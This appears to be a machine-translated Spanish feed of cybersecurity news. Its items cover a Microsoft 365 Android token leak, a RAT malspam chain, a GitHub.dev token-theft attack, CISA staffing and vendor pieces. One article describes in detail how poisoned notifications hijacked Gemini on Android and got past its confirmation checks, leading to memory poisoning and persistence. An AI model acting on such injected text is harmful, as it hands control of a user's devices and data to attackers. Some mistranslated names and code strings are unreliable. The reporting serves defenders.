Las aplicaciones de Android de Microsoft 365 permiten que cualquier aplicación robe tokens de cuenta a través del indicador de depuración sobrante

Un indicador de desarrollo que se dejó activado en las compilaciones de producción de varias aplicaciones de Microsoft 365 para Android deshabilitó la verificación que limita el uso compartido de tokens de cuenta con aplicaciones confiables de Microsoft.

Cualquier otra aplicación en el mismo teléfono podría solicitar el token del usuario que inició sesión y obtenerlo, luego leer el correo electrónico, abrir archivos, explorar el calendario y enviar mensajes como ese usuario. Sin contraseña, sin pantalla de inicio de sesión, sin solicitud de permiso.

Microsoft lo ha parcheado y, si ejecuta aplicaciones de Microsoft 365 en Android, actualícelas.

El error, que Enclave llamadas BanderaIzquierdallegó a Word, PowerPoint, Excel, Microsoft 365 Copilot, Microsoft Loop y OneNote, seis aplicaciones con miles de millones de descargas entre ellas. Los equipos se enviaron con la misma bandera configurada como falsa y no se vieron afectados, lo que Enclave lee como un desliz en lugar de un diseño.

Ciberseguridad

Las aplicaciones de Microsoft 365 comparten el acceso a la cuenta a propósito, por lo que iniciar sesión en Word significa que no vuelve a iniciar sesión en PowerPoint. Se supone que la transferencia verifica quién pregunta y rechaza cualquier cosa que no sea una aplicación confiable de Microsoft.

Yanir Tsarimi y Ofek Levin de Enclave descubrieron que el cheque se había saltado debido a que quedaba una sola línea en el código de envío: setIsDebugMode(verdadero). La falla se encontraba en un SDK compartido de Microsoft, por lo que el mismo agujero apareció en una aplicación tras otra.

Los tokens entregados fueron tokens FOCI, la familia actualiza los tokens que Microsoft usa para el inicio de sesión único en todas sus aplicaciones. Se pueden actualizar y reutilizar durante largos períodos, y el tráfico resultante parece rutinario en los registros. Desde el lado del usuario, no sucede nada visible.

Enclave creó una prueba de concepto funcional que extraía tokens a través de una aplicación de terceros no verificada y leía el correo electrónico con ellos. Microsoft los clasifica como defectos de suplantación de identidad locales; En términos sencillos, todo lo que se necesita es una aplicación maliciosa que ya esté instalada en el dispositivo.

Microsoft emitió cuatro CVE el 12 de mayo, todos clasificados como suplantación de identidad bajo control de acceso inadecuado (CWE-284): CVE-2026-41100 para copiloto de Microsoft 365 (CVSS 4.4), CVE-2026-41101 para Word (CVSS 7.1), CVE-2026-41102 para PowerPoint (CVSS 7.1), y CVE-2026-42832 para Excel (CVSS 7.7). Los cuatro CVE cubren Copilot, Word, PowerPoint y Excel.

Enclave informó la misma falla en Loop y OneNote, pero ninguno obtuvo un CVE separado en el lote de mayo. NVD enumera la compilación de Word parcheada para Android como 16.0.19822.20190, con versiones anteriores afectadas. Las otras aplicaciones se solucionaron mediante las mismas actualizaciones de Google Play.

Ciberseguridad

Nada en el lanzamiento del martes de parches de mayo de Microsoft figuraba como conocido públicamente o explotado, y no hay evidencia pública de que la falla se haya utilizado antes de la solución.

¿Qué hacer? Actualice Word, PowerPoint, Excel, Microsoft 365 Copilot, Loop y OneNote desde Google Play. Los equipos de seguridad que administran flotas de Android deben enviar las actualizaciones a través de MDM y confirmar que los dispositivos no tienen versiones anteriores a 16.0.19822.20190.

El parche cierra el agujero, pero no elimina retroactivamente los tokens que un atacante ya pueda tener. Los tokens de actualización de FOCI duran más que una actualización de la aplicación, por lo que para las cuentas en dispositivos que ejecutaron una versión antigua junto con aplicaciones que no son de confianza, vale la pena revocar los tokens de actualización y forzar un nuevo inicio de sesión.

Las autoridades europeas toman medidas enérgicas contra las redes de streaming ilegales

Autoridades en Europa detenidos 29 presuntos ciberdelincuentes y eliminó más de 27.000 URL de transmisión ilegal que pirateaban importantes eventos deportivos, películas y programación de televisión, dijo Europol el miércoles.

La colaboración a nivel continental, encabezada por Bulgaria y la agencia policial de la Unión Europea, permitió a las autoridades desmantelar nueve grupos del crimen organizado que apoyaban las redes de streaming ilícitas, dijeron los funcionarios. La “Operación Kratos 2” se centró en alterar la infraestructura subyacente de las redes y se prolongó durante siete meses antes de finalizar en abril.

Los funcionarios no nombraron a los sospechosos, grupos o servicios atacados durante la represión, pero señalaron que los investigadores identificaron a los actores clave responsables de gestionar y operar las plataformas de piratería.

Europol dijo que los sitios de transmisión infringieron casi 850.000 medios en 169 dominios.

«Lo que a los consumidores les parece un acceso barato a contenidos premium está impulsado por complejas empresas criminales», dijo la agencia en un comunicado de prensa. Los operadores de sitios de transmisión ilegal alojan servidores separados para sitios web orientados al cliente y contenido ilegal, y distribuyen sus servicios en varios países.

Durante el transcurso de la operación, los funcionarios realizaron 148 registros domiciliarios, identificaron a 86 sospechosos y remitieron 59 casos a los tribunales para iniciar procesos penales.

Los investigadores también trabajaron con socios del sector privado para identificar casi 4.400 nuevos dominios y más de 18.000 direcciones IP vinculadas a la piratería y otras actividades ilegales. Esos esfuerzos permitieron a las autoridades informar casi 400.000 URL adicionales para su suspensión o eliminación.

Las redes de piratería de deportes en vivo están muy extendidas y las coaliciones y autoridades antipiratería de todo el mundo las rastrean constantemente. El año pasado, las autoridades de Egipto cerraron Streameast, la red ilegal de transmisión de deportes en vivo más grande y popular en ese momento, con una operación que abarcaba 80 dominios y registró más de 1.600 millones de visitas durante el año anterior.

La Operación Kratos 2 contó con el apoyo de asociaciones antipiratería, la UEFA Europa League, La Liga, beIN Media Group y funcionarios de Bélgica, Bulgaria, Croacia, Francia, Grecia, Irlanda, Italia, Países Bajos, Polonia, Rumania, España, Reino Unido y Estados Unidos.

Matt Kapko

Escrito por Matt Kapko

Matt Kapko es reportero de CyberScoop. Su ámbito incluye delitos cibernéticos, ransomware, defectos de software y (mala) gestión de vulnerabilidades. El californiano de toda la vida comenzó su carrera periodística en 2001 con paradas anteriores en Cybersecurity Dive, CIO, SDxCentral y RCR Wireless News. Matt tiene una licenciatura en periodismo e historia de la Universidad Estatal de Humboldt.

Se abusa de Google DoubleClick en una nueva campaña de malspam para ofrecer DesckVB RAT – CYBERDEFENSA.MX

Los investigadores de ciberseguridad han detectado una nueva campaña de malspam que utiliza el dominio DoubleClick de Google como una forma de evadir la detección y, en última instancia, entregar un troyano de acceso remoto (RAT) llamado DesckVB RAT.

«Antes de que la víctima llegue a la infraestructura controlada por el atacante, el señuelo pasa por DoubleClick, un dominio legítimo propiedad de Google que es menos probable que muchas herramientas de seguridad traten como sospechoso», afirman los investigadores de Huntress, Anna Pham y Adam Mooney. dicho en un informe compartido con The Hacker News.

«A partir de ahí, la víctima pasa a un kit de malspam que se personaliza sobre la marcha utilizando la dirección de correo electrónico de la víctima, incorporando dinámicamente la marca de la empresa y los detalles de la ubicación para que la página parezca convincente sin necesidad de que los operadores creen un señuelo para cada objetivo».

Lo que hace que este ataque sea digno de mención es que elimina la necesidad de tener un kit personalizado para cada organización objetivo, lo que hace que estas operaciones sean más escalables y rentables. El objetivo final de la campaña es eliminar DesckVB RAT, un troyano basado en .NET que ha estado activo desde febrero de 2026.

Ciberseguridad

El ataque comienza cuando un usuario desprevenido abre un archivo HTML adjunto a un correo electrónico de phishing. El archivo activa una redirección de meta-actualización del navegador a una URL de seguimiento de clics de Google DoubleClick Campaign Manager, desde donde se dirige al usuario a otro redirector, que decodifica la dirección de correo electrónico codificada en Base64 y lleva a la víctima a una página de destino que contiene un botón «Descargar PDF».

Al hacer clic en el botón, el servidor responde con un archivo ZIP que inicia el resto de la cadena de infección. Esto se logra mediante un cargador de JavaScript, cuya principal responsabilidad es recuperar y ejecutar un .NET RAT mientras pasa desapercibido. El script extrae y ejecuta un script de PowerShell, que luego recupera un cargador .NET de un servidor externo.

El cargador actúa como un dispositivo que verifica que no está siendo analizado, neutraliza los controles de seguridad de la máquina, configura la persistencia y, finalmente, descarga y ejecuta la carga útil RAT mediante el uso de una técnica llamada proceso hueco que implica inyectar el malware en procesos firmados por Microsoft.

Una vez iniciado, el troyano se comunica con un servidor de comando y control (C2) a través de sockets TCP sin formato, realiza reconocimiento del sistema y configura exclusiones de Microsoft Defender. El troyano también parchea la interfaz de escaneo antimalware (AARMI) y seguimiento de eventos para Windows (ETW) en el nivel API nativo desde el principio en un esfuerzo por cegar la telemetría de Windows antes de que se establezca la persistencia en el host configurando las entradas del Registro Run y ​​RunOnce, además de colocar un cargador responsable de iniciar el RAT en la carpeta de Inicio del usuario.

Ciberseguridad

El malware viene con capacidades para extraer datos, ejecutar comandos y desplegar cargas útiles adicionales, otorgando a los atacantes control total sobre las máquinas infectadas, al mismo tiempo que toma medidas para pasar desapercibido al finalizar y reiniciar la máquina si detecta una herramienta de análisis o determina que se está ejecutando en un entorno aislado.

«Este es un fuerte recordatorio de por qué es importante la defensa en profundidad», dijo Huntress. «Configurar un objeto de política de grupo (GPO) en Active Directory para forzar la apertura predeterminada de archivos de script como .vbs, .hta y .js en el Bloc de notas puede detener a un actor de amenazas en la primera etapa, evitando que se eliminen cargas adicionales».

«En el frente de la seguridad del correo electrónico, las organizaciones deberían considerar implementar registros DMARC, DKIM y SPF para reducir la probabilidad de que correos electrónicos falsificados o maliciosos lleguen a los usuarios finales. Más allá de eso, una solución de puerta de enlace de correo electrónico capaz de proteger archivos adjuntos y enlaces antes de la entrega agrega otra capa significativa de protección».

WhatsApp y las notificaciones de Slack podrían secuestrar Google Gemini en Android – CYBERDEFENSA.MX

Una sola notificación envenenada de WhatsApp, Slack, SMS, Signal, Instagram o Messenger podría haber secuestrado el asistente de voz de Google Gemini en Android y haberlo obligado a abrir las ventanas conectadas de una víctima, falsificar un mensaje de su jefe, empujar el teléfono a una llamada de Zoom o envenenar silenciosamente su memoria a largo plazo.

No se requiere ninguna aplicación maliciosa en el teléfono. El asistente sólo tenía que tratar una notificación hostil como un contexto útil.

La investigación, publicado de Or Yair de SafeBreach, sigue el trabajo anterior del equipo «La invitación es todo lo que necesitas», que realizó trucos similares a través de invitaciones maliciosas de Google Calendar. Después de eso, Google Géminis endurecido contra la inyección inmediata indirecta.

Yair encontró una manera de sortear las nuevas defensas. Desde entonces, Google lo parchó, SafeBreach no enumera ningún CVE para el problema y no hay evidencia de que la técnica se haya utilizado alguna vez en la naturaleza.

En Android, Géminis Característica de utilidades Puede leer y responder a sus notificaciones, incluidas las de aplicaciones como WhatsApp. No está disponible en iOS ni en la web, lo que mantiene este vector solo para Android. Yair descubrió que el agente que lee esas notificaciones trata su texto como instrucciones sobre las que puede actuar. Entonces, cualquier cosa que pueda enviar una notificación a un teléfono puede entregar una carga útil, una superficie de ataque que Yair llamó «efectivamente infinito«.

Ciberseguridad

Como mínimo, eso permite a un atacante reescribir lo que dice Gemini, incluso falsificar un mensaje de un contacto designado. Dicho en voz alta mientras conduce y no mira la pantalla, «su gerente le pidió que cargue los documentos en esta carpeta de Drive» es difícil de adivinar. La versión ciega es peor: la carga útil se activa después de que Gemini haya cargado notificaciones reales, por lo que puede tomar el primer nombre real del remitente en la cola y fijarle el mensaje falso.

Falsificar resultados es una cosa. Activar herramientas reales, como abrir una ventana o iniciar una aplicación, es para lo que se crearon las mitigaciones posteriores a la «Invitación» de Google. Yair leyó, a partir de pruebas de caja negra: cuando un «Sí» autoriza una acción sensible, una verificación pesa tanto la respuesta del usuario como el último resultado de Gemini para decidir si ese «Sí» tiene sentido. Inyecte una instrucción retrasada de la nada, y Géminis se negó, cada vez.

Entonces el bypass, que Yair nombró Alineación de contexto falsagenera dos ilusiones a la vez: una autorización aparentemente legítima para el control de seguridad, un intercambio inofensivo para el ser humano.

  • Ofuscado. Gemini hace la pregunta de autorización real en un idioma que la víctima no habla, digamos chino («¿Quieres abrir la ventana?»), luego sigue en inglés con algo inofensivo como «¿Eso es todo lo que necesitas?» El usuario ignora la frase extranjera como un error, dice «Sí» y el servidor vincula ese «Sí» con la pregunta china.
  • Apagado. La conversión de texto a voz de Gemini omite los hipervínculos ocultos detrás del texto en el que se puede hacer clic. Entonces, la pregunta maliciosa queda oculta en un enlace que el asistente nunca lee en voz alta. Géminis dice: «Lo siento, tuve un error, ¿estás ahí?» mientras la pantalla muestra silenciosamente «¿Quieres abrir la ventana?» El conductor dice «Sí», el cheque ve el texto en pantalla y las ventanas se abren.

Combine los dos, un mensaje de autorización en chino escondido dentro de un enlace silenciado, y obtendrá una carga útil que suena como un intercambio normal en inglés mientras se borran los controles más recientes de Google.

Ciberseguridad

Más allá de la autorización, los impactos coincidieron con la investigación anterior y luego fueron más allá:

  • Control inteligente del hogar a través de Google Home: ventanas, calderas y luces conectadas.
  • Seguimiento y descargas. Abrir URL para geolocalizar a una víctima por IP o enviar descargas de archivos.
  • Cruzando a otras aplicaciones. En la demostración, Yair configuró un dominio que parecía seguro para redirigir a un enlace de la aplicación Zoom, y Gemini lo siguió sin preguntar, lo que obligó al teléfono a unirse a una reunión y transmitir video. Según su cuenta, funcionó porque Gemini confió en el dominio después de haber entregado contenido limpio y luego siguió la redirección posterior. SafeBreach destaca que su propio dominio nunca fue redirigido a Zoom; la redirección se ejecutó en un servidor local en el dispositivo de prueba.
  • Envenenamiento de la memoria, que la técnica del calendario anterior nunca logró. La alineación de contexto falsa simula el consentimiento, por lo que Gemini guardó persistentemente un hecho elegido por el atacante. En la demostración, almacenó el nombre de la víctima como «Danny». Debido a que esa memoria está a nivel de cuenta, el hecho envenenado no está atrapado en el teléfono; sigue a la víctima donde quiera que use Gemini en esa cuenta.
  • Persistencia a través de acciones programadas, como una tarea recurrente para leer los mensajes recientes de la víctima todos los días a las 8 p.m.

SafeBreach informó los hallazgos al Programa de recompensas por vulnerabilidades de Google el 17 de agosto de 2025. Google lo trató como una alta prioridad y confirmó el 14 de noviembre de 2025 que las mejoras en el clasificador de contenido mitigaron las inyecciones de notificaciones y la omisión de invocación retrasada de herramientas.

Debido a que la solución está en el lado del servidor, no hay que buscar ninguna actualización de la aplicación. El único control que tienen los usuarios es si Gemini lee las notificaciones: desconecte la aplicación Utilidades en la configuración de Aplicaciones conectadas de Gemini o desactive el permiso «Lectura, respuesta y control de notificaciones» de la aplicación Google en Android.

El secretario del DHS, Markwayne Mullin, señala los niveles óptimos de dotación de personal de CISA

El secretario del Departamento de Seguridad Nacional, Markwayne Mullin, dijo al Congreso el miércoles que la Agencia de Seguridad de Infraestructura y Ciberseguridad idealmente tendría 2.800 personas, frente a los aproximadamente 2.200 actuales y menos que los 3.400 antes de que comenzara la segunda administración Trump.

El presidente Donald Trump ha presionado para reducir drásticamente la cantidad de personal en la agencia, algo que ha generado críticas tanto de demócratas como de republicanos en el Capitolio. Trump ha propuesto cientos de millones más en recortes para el año fiscal 2027.

El presidente del Comité de Seguridad Nacional de la Cámara de Representantes, Andrew Garbarino, RN.Y., preguntó a Mullin en una audiencia el miércoles sobre nuevos recortes presupuestarios propuestos por CISA, diciendo que estaba «preocupado» por la cantidad de personal y la financiación de los programas educativos y si el plan del año fiscal 2027 «tendría un impacto negativo en esos esfuerzos».

Mullin dijo que las fallas de financiamiento del DHS han hecho que el departamento reconsidere CISA, aunque las profundas reducciones de personal de CISA son anteriores a la reciente serie de cierres gubernamentales.

«Tuvimos que reajustar la forma en que miramos a CISA y apoyarnos mejor en las asociaciones públicas», dijo. La agencia puede trabajar bien con 2.800 personas. “Si realmente podemos tener las asociaciones que necesitamos con los estados y poder utilizar las subvenciones, el dinero que necesitamos [we] ahorrado con CISA para poder invertir con municipios locales y estatales. … No vamos a fracasar en la misión que tenemos por delante”.

Las cifras de personal de CISA están en constante cambio. La cifra de 2.200 empleados de CISA que proporcionó Mullin es inferior incluso a la de diciembre. En marzo, el director interino Nick Andersen dijo que CISA estaba buscando contratar 300 personas.

Hasta la fecha no ha habido ninguna propuesta por parte de la administración Trump para tomar fondos anteriormente asignados a CISA y transferirlos a los gobiernos estatales para ciberseguridad. funcionarios estatales han dicho que los recortes presupuestarios de CISA han dificultado su trabajo, y la mayoría de los expertos han dicho que el enfoque de la administración Trump de trasladar las responsabilidades cibernéticas a los estados está muy equivocado.

El Congreso aún tiene que reautorizar permanentemente el Programa de Subvenciones de Ciberseguridad Estatal y Local que expiró el año pasado antes de obtener una extensión temporal y que expirará nuevamente en septiembre.

CISA ha estado sin un director confirmado por el Senado durante toda la segunda administración Trump. Mullin dijo que «pronto será nominada una persona que dirigirá CISA y que tiene la capacidad de reclutar y concentrarse en las autoridades que tenemos».

Mullin dijo que CISA tiene autoridades «únicas» que no han «sido utilizadas por completo».

“Queremos que CISA sea líder en ciberseguridad”, afirmó. “Deberían serlo y lo serán”.

Un subcomité de Apropiaciones de la Cámara está listo para considerar un proyecto de ley de financiación del DHS el viernes.

Tim Starks

Escrito por Tim Starks

Tim Starks es reportero senior de CyberScoop. Sus paradas anteriores incluyen trabajar en The Washington Post, POLITICO y Congressional Quarterly. Originario de Evansville, Indiana, se ocupa de la ciberseguridad desde 2003. Envíe un correo electrónico a Tim aquí: tim.starks@cyberscoop.com.

vea su red como un atacante – CYBERDEFENSA.MX

Asume el incumplimiento. Los días cero siguen enviándose, la IA está escribiendo exploits más rápido de lo que nadie parchea y «parchear todo a tiempo» dejó de funcionar hace años. Deja de apostar a la organización a ganar esa carrera. No controlas qué insecto aterriza. Tú controlas lo que puede alcanzar una vez que lo hace.

Esa es una pregunta sobre la forma de su red, y la mayoría de los equipos tienen la forma incorrecta. HD Moore, creador de Metasploit y ahora director ejecutivo de runZero, pasa la sesión mostrándote esa forma desde el lado del atacante.

Reserva tu asiento para una sesión EN VIVOo regístrate y te enviaremos la grabación.

La segmentación que crees tener

La suposición cómoda: los sistemas críticos se encuentran detrás de un firewall o en su propio segmento, por lo que un punto de apoyo aquí no puede convertirse en un desastre allá. Llámelo la ilusión de segmentación. Se mantiene hasta que alguien mapea la red de verdad.

Entonces aparecen las costuras. Un dispositivo conectado a dos redes a la vez, uniendo silenciosamente las zonas que deseaba mantener separadas. Equipo conectado que nadie registró, respondiendo en un segmento en el que no debería estar. Conjuntos completos de máquinas escondidas detrás de una puerta de enlace de protocolo industrial, invisibles para su escáner, accesibles para cualquiera que sepa que la puerta de enlace está ahí. Nada de eso está en la lista de activos. Todo gira alrededor del control con el que contabas.

El inventario es una lista. Los atacantes leen un mapa.

Mantienes un inventario, una lista estática de las cosas que posees. A un atacante no le importa tu lista. Les importan los caminos: cómo un punto de apoyo llega al siguiente, hasta aterrizar en algo que duele. Las dos vistas rara vez coinciden y la diferencia es exactamente la parte de su red que usted no puede ver y ellos sí. Moore construyó Metasploit, el marco en el que la mitad de la industria aprendió a atacar, y ahora dirige la empresa cuyo trabajo consiste en encontrar los activos y las conexiones que las organizaciones no saben que tienen.

Toma tu lugar y vea esa vista enfocada en su propio entorno.

Lo que dejas capaz de hacer

  • Encuentre los activos que no sabe que tiene. TI no autorizada, IoT en la sombra y los subactivos detrás de las puertas de enlace del protocolo OT donde sus escaneos nunca aparecen.
  • Encuentra los puentes que rompen la segmentación. Los dispositivos multitarjeta y los activos olvidados que conectaban zonas que usted creía estaban aislados.
  • Vea los caminos, no sólo las partes. Cambie el inventario estático por un mapeo de rutas de ataque en vivo que muestre cómo viaja realmente un punto de apoyo.
  • Arregle las pocas cosas que importan. Centrar la reparación en los activos y enlaces que acortan la ruta de un atacante hacia el impacto.

La red corporativa, la fábrica o ambos entrelazados: si TI, IoT y OT comparten su entorno, las uniones entre ellos son donde esto sale mal. Vea su red como ya lo hace un atacante, antes que él.

Regístrate ahora. ¿No puedes hacerlo vivir? Regístrese de todos modos y le enviaremos la grabación.

¿Encontró interesante este artículo? Este artículo es una contribución de uno de nuestros valiosos socios. Síguenos en noticias de google, Gorjeo y LinkedIn para leer más contenido exclusivo que publicamos.

El ataque de desarrollo de GitHub con un solo clic permite a los atacantes robar tokens completos de OAuth de GitHub – CYBERDEFENSA.MX

Investigadores de ciberseguridad han revelado un ataque con un solo clic a través de Microsoft Visual Studio Code (VS Code) que permite robar el token de GitHub de un usuario.

«Con solo hacer clic en un enlace, es posible que un atacante robe un token de GitHub que puede leer y escribir en sus repositorios, incluidos los privados», dijo el investigador de seguridad Ammar Askar. dicho.

GitHub admite una función llamada GitHub.dev que corre como un editor de código fuente ligero basado en web en la zona de pruebas del navegador web iniciando un entorno VS Code. Permite a los usuarios enviar solicitudes de extracción y realizar confirmaciones.

Ciberseguridad

«Esta funcionalidad se logra mediante la PUBLICACIÓN de github.com a través de un token OAuth en github.dev que le permite interactuar con GitHub en su nombre», dijo Askar. «El token no tiene como alcance el repositorio particular con el que interactuó, lo que significa que tiene acceso completo a todos los demás repositorios a los que tiene acceso».

En pocas palabras, la vulnerabilidad permite a los atacantes instalar extensiones maliciosas de VS Code que roban tokens GitHub OAuth cuando se pasan a GitHub.dev mediante la explotación de un mecanismo de paso de mensajes entre la ventana principal de VS Code y vistas web. Las vistas web se utilizan para representar vistas previas de Markdown o editar cuadernos de Jupyter.

Específicamente, el exploit ejecuta JavaScript malicioso dentro de una vista web que no es de confianza para simular pulsaciones de teclas (también conocidas como eventos de pulsación de teclas) en la ventana principal del editor, abre la paleta de comandos activando «Ctrl+Shift+P» e instala una extensión controlada por el atacante que extrae el token GitHub OAuth enviado a GitHub.dev y consulta la API de GitHub para enumerar todos los repositorios privados a los que puede acceder la víctima.

Vale la pena señalar que el enfoque también aprovecha una característica de VS Code llamada extensiones de espacio de trabajo local que permite instalar una extensión directamente sin presentar ningún adicional mensaje de diálogo de confianza siempre y cuando esté ubicado en la carpeta «.vscode/extensions» dentro de ese espacio de trabajo, evitando efectivamente la verificación de confianza del editor.

Ciberseguridad

«Sin embargo, esto es sólo un pequeño inconveniente, una de las cosas que las extensiones pueden hacer como parte de su paquete.json es contribuir con combinaciones de teclas adicionales a VS Code», explicó el investigador. «Dado que podemos activar combinaciones de teclas de manera confiable, podemos simplemente agregar una combinación de teclas para cualquier comando de VS Code que queramos, como instalar una extensión y omitir la verificación del editor confiable».

El investigador también señaló que GitHub era notificado de la vulnerabilidad el 2 de junio de 2026, una hora después de la cual los detalles del problema se hicieron públicos, citando a Microsoft manejo de Errores relacionados con VS Code en el pasado. Al momento de escribir este artículo, Microsoft reconoció la vulnerabilidad y señaló que está trabajando en una solución.

«Para aclarar, este problema no afecta a VS Code Desktop», dijo Alexandru Dima, gerente de ingeniería de software asociado de Microsoft.

Reducir la superficie de ataque de IAM a través de plataformas de inteligencia y visibilidad de identidad (IVIP) – CYBERDEFENSA.MX

El estado fragmentado de la identidad empresarial moderna

La IAM empresarial se está acercando a un punto de ruptura. A medida que las organizaciones escalan, la identidad se fragmenta cada vez más en miles de aplicaciones, equipos descentralizados, identidades de máquinas y sistemas autónomos.

El resultado es Identity Dark Matter: actividad de identidad que se encuentra fuera de la visibilidad del IAM centralizado y fuera del alcance de los equipos de seguridad.

De acuerdo a Seguridad de orquídeas‘s análisisel 46 % de la actividad de identidad empresarial se produce fuera de la visibilidad centralizada de IAM. En otras palabras, casi la mitad de la superficie de identidad empresarial puede estar funcionando sin ser vista. Esta capa oculta incluye aplicaciones no administradas, cuentas locales, flujos de autenticación opacos e identidades no humanas con permisos excesivos. Se ve amplificado aún más por herramientas desconectadas, propiedad aislada y el rápido aumento de la IA agente.

La consecuencia es una brecha cada vez mayor entre lo que las organizaciones de seguridad creen que tienen y el acceso que realmente existe. Esa brecha es donde ahora reside el riesgo de identidad moderno.

Definición de la categoría IVIP: la capa de visibilidad y observabilidad

Para cerrar estas brechas, Gartner ha introducido la Plataforma de Inteligencia y Visibilidad de Identidad (IVIP) como un «Sistema de Sistemas» fundamental. Dentro del marco de Identity Fabric, los IVIP ocupan la Capa 5: Visibilidad y Observabilidad, proporcionando una capa independiente de supervisión por encima de la gestión y la gobernanza del acceso.

Por definición formal, una solución IVIP incorpora y unifica rápidamente datos de IAM, aprovechando análisis impulsados ​​por IA para proporcionar una ventana única a los eventos de identidad, las relaciones entre el usuario y los recursos y la postura.

Característica IAM/IGA tradicional IVIP / Observabilidad
Alcance de visibilidad Solo aplicaciones integradas y gobernadas Integral: sistemas administrados, no administrados y desconectados
Fuente de datos Declaraciones de propietario y documentación manual. Información continua en tiempo de ejecución y telemetría a nivel de aplicación
Método de análisis Revisiones de configuración estática e «Inferencia» Descubrimiento continuo y prueba basada en evidencia
Inteligencia Lógica básica basada en reglas Descubrimiento de intenciones y análisis de comportamiento impulsado por LLM

Lo que realmente debe hacer un IVIP

Un IVIP creíble no puede ser simplemente otro depósito de identidad. Tiene que servir como motor de inteligencia activo para el ecosistema de identidad empresarial.

En primer lugar, debe proporcionar continuo descubrimiento de identidades humanas y no humanas en todos los sistemas relevantes, incluidos aquellos que se encuentran fuera de la incorporación formal de IAM. En segundo lugar, debe actuar como plataforma de datos de identidadunificando información fragmentada de directorios, aplicaciones e infraestructura en una fuente de verdad más coherente. En tercer lugar, debe cumplir inteligenciautilizando análisis e inteligencia artificial para convertir señales de identidad dispersas en información de seguridad significativa.

Desde un punto de vista técnico, eso significa respaldar capacidades como automatizado remediaciónpor lo que las brechas de postura se pueden corregir directamente en la pila de IAM; intercambio de señales en tiempo realutilizando estándares como CAEP para desencadenar acciones de seguridad inmediatas; y inteligencia basada en intencionesdonde los LLM ayudan a interpretar el propósito detrás de la actividad de identidad y separar el comportamiento operativo normal de los patrones verdaderamente riesgosos.

Este es el cambio de la visibilidad de la identidad a la comprensión de la identidad y, en última instancia, al control de la identidad.

Orchid Security: entrega del avión de control IVIP

Orchid Security pone en funcionamiento el modelo de Plataforma de Inteligencia y Visibilidad de Identidad (IVIP) transformando señales de identidad fragmentadas en inteligencia continua a nivel de aplicación. En lugar de depender únicamente de integraciones de IAM centralizadas, Orchid genera visibilidad directamente desde la propia aplicación, lo que permite a las organizaciones descubrir, unificar y analizar la actividad de identidad en todos los sistemas que las herramientas tradicionales no pueden ver.

1. Visibilidad y alcance de los datos: ver la aplicación completa y el estado de identidad

Un requisito central del IVIP es descubrimiento continuo de identidades y los sistemas en los que operan. Orchid logra esto a través del análisis binario y la instrumentación dinámica, lo que le permite inspeccionar Lógica nativa de autenticación y autorización directamente dentro de las aplicaciones y la infraestructura. sin requerir API, cambios de código fuente o integraciones prolongadas.

Este enfoque proporciona una ventaja fundamental en el descubrimiento de propiedades de aplicaciones. Muchas empresas no pueden controlar identidades entre aplicaciones que los equipos de seguridad centrales ni siquiera saben que existen. Orchid saca a la luz estos sistemas primero, porque no puedes evaluar, gobernar o asegurar lo que no puedes ver. Al identificar el estado real de las aplicaciones, incluidas aplicaciones personalizadas, COTS, sistemas heredados y TI en la sombra, Orchid revela la materia oscura de identidad incorporada en ellas, como cuentas locales, rutas de autenticación no documentadas e identidades de máquinas no administradas.

2. Unificación de datos: construcción de la capa de evidencia de identidad

Las plataformas IVIP deben unificar datos de identidad fragmentados en una imagen operativa consistente. Orchid logra esto capturando telemetría de auditoría patentada desde aplicaciones internas y combinándolo con registros y señales de sistemas IAM centralizados.

El resultado es un capa de datos de identidad basada en evidencia que muestra cómo se comportan realmente las identidades en el entorno. En lugar de depender de suposiciones de configuración o integraciones incompletas, las organizaciones obtienen una visión unificada de:

  • Identidades entre aplicaciones e infraestructura
  • Flujos de autenticación y autorización
  • Relaciones de privilegios y rutas de acceso externo

Esta evidencia unificada permite a los equipos de seguridad conciliar la brecha entre la política documentada y el acceso operativo real.

3. Inteligencia: convertir la telemetría en información procesable

Un IVIP debe transformar la telemetría de identidad en inteligencia procesable. Las auditorías de identidad entre estados de Orchid demuestran cuán poderosa se vuelve esta capa cuando la actividad de identidad se analiza directamente a nivel de aplicación.

En todos los entornos empresariales, Orquídea observa eso:

  • El 85% de las aplicaciones contienen cuentas de dominios heredados o externos.con 20% utiliza dominios de correo electrónico para consumidorescreando un importante riesgo de filtración de datos.
  • El 70% de las aplicaciones contienen privilegios excesivoscon 60% otorga amplio acceso administrativo o API a terceros.
  • El 40% de todas las cuentas están huérfanas., subiendo a 60% en algunos entornos heredados.

Estas ideas no se infieren de las políticas; se observan directamente desde el comportamiento de identidad dentro de las aplicaciones. Esto hace que las organizaciones pasen de una postura de inferencia basada en la configuración a una inteligencia de identidad basada en evidencia.

Extendiendo IVIP a la próxima frontera de identidad: agentes de IA

Los agentes autónomos de IA representan la próxima ola de materia oscura de identidad, y a menudo operan con identidades y permisos independientes que quedan fuera de los modelos de gobernanza tradicionales. Orchid extiende el marco IVIP a estas identidades emergentes a través de su Agente guardián arquitectura, lo que permite a las organizaciones aplicar la gobernanza Zero Trust a la actividad impulsada por la IA.

La adopción segura de agentes de IA se guía por cinco principios:

  • Atribución de humano a agente: Cada acción de un agente está vinculada a un propietario humano responsable.
  • Auditoría de actividad: Se registra una cadena de custodia completa (Agente → Herramienta/API → Acción → Destino).
  • Barandillas sensibles al contexto: Las decisiones de acceso se evalúan dinámicamente en función de la sensibilidad del recurso y los derechos del propietario humano.
  • Mínimo privilegio: El acceso Just-in-Time reemplaza las credenciales privilegiadas persistentes.
  • Remediación automatizada: El comportamiento riesgoso puede desencadenar respuestas automatizadas, como la rotación de credenciales o la finalización de la sesión.

Combinando descubrimiento de propiedades de aplicaciones, telemetría de identidad e inteligencia impulsada por IAOrchid cumple la misión central de IVIP: convertir la actividad de identidad invisible en una superficie de seguridad gobernada, observable y controlable.

Medición del éxito: métricas basadas en resultados (ODM) y remediación

Las decisiones de identidad son tan buenas como los datos que las sustentan. Los CISO deben pasar de los «controles implementados» a las métricas basadas en resultados (ODM).

  • Ejemplo de ODM: En lugar de contar las licencias IGA, mida la reducción de los derechos no utilizados (inactivos) del 70% al 10% dentro de un trimestre fiscal.
  • Acuerdos de nivel de protección (PLA): Negociar los resultados objetivos con la empresa. Un EPL podría exigir la revocación del acceso crítico en un plazo de 24 horas para quien lo abandone, reduciendo significativamente la ventana de oportunidad del atacante.
  • Retorno de la inversión empresarial: Al pasar a la observabilidad continua, las organizaciones pueden reducir la preparación de las auditorías de meses a minutos mediante la generación automatizada de evidencia de cumplimiento.

Hoja de ruta de implementación estratégica para líderes de IAM

Para reducir la superficie de ataque, recomendamos las siguientes acciones prioritarias:

